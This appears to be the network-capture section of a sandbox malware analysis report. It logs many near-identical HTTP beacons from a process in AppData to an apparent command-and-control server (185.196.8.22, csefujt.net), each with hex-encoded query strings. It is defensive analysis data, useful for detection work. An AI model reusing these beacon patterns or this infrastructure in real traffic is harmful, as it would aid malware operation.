Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
8 | 192.168.2.6 | 49743 | 185.196.8.22 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:31.381170034 CET | 318 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef810c3ee939b3c HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:31.638701916 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10d2f884de448dd6bcc1b3a4241fa4a381035e7bb369bc54371c3edd26116
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.638885975 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:13:34.282923937 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:34.532052994 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49745 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:34.863394976 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:35.104325056 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49747 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:35.653923988 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:35.896358967 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49748 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:36.498306036 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:36.739445925 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 12
Source IP: 192.168.2.6
Source Port: 49749
Destination IP: 185.196.8.22
Destination Port: 80
PID: 4328
Process: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp: Feb 5, 2024 12:13:37.979057074 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:38.222875118 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Feb 5, 2024 12:13:38.336050034 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:38.573187113 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 13
Source IP: 192.168.2.6
Source Port: 49750
Destination IP: 185.196.8.22
Destination Port: 80
PID: 4328
Process: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp: Feb 5, 2024 12:13:38.910409927 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:39.152757883 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 14
Source IP: 192.168.2.6
Source Port: 49751
Destination IP: 185.196.8.22
Destination Port: 80
PID: 4328
Process: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp: Feb 5, 2024 12:13:39.485261917 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:39.722048998 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Feb 5, 2024 12:13:39.839637041 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:40.076411963 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 15
Source IP: 192.168.2.6
Source Port: 49752
Destination IP: 185.196.8.22
Destination Port: 80
PID: 4328
Process: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp: Feb 5, 2024 12:13:40.450141907 CET
Bytes transferred: 326
Direction: OUT
Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Feb 5, 2024 12:13:40.690221071 CET
Bytes transferred: 220
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49753 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:41.029175043 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:41.275964975 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49754 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:41.617321968 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:41.854145050 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49755 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:42.187668085 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:42.429614067 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49756 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:42.758116007 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:42.998167992 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49757 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:43.327039003 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:43.569910049 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Feb 5, 2024 12:13:43.682686090 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:43.919538975 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:43 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49758 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:44.270222902 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:44.512965918 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49759 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:44.840574980 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:45.080754995 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49760 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:45.405688047 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:45.650687933 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49761 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:45.985249996 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:46.226401091 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49762 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:46.563461065 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:46.800832033 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49763 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:47.124027014 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:47.365269899 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49764 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:47.731920958 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:47.968765020 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49765 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:48.304836035 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:48.547673941 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49766 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:48.876193047 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
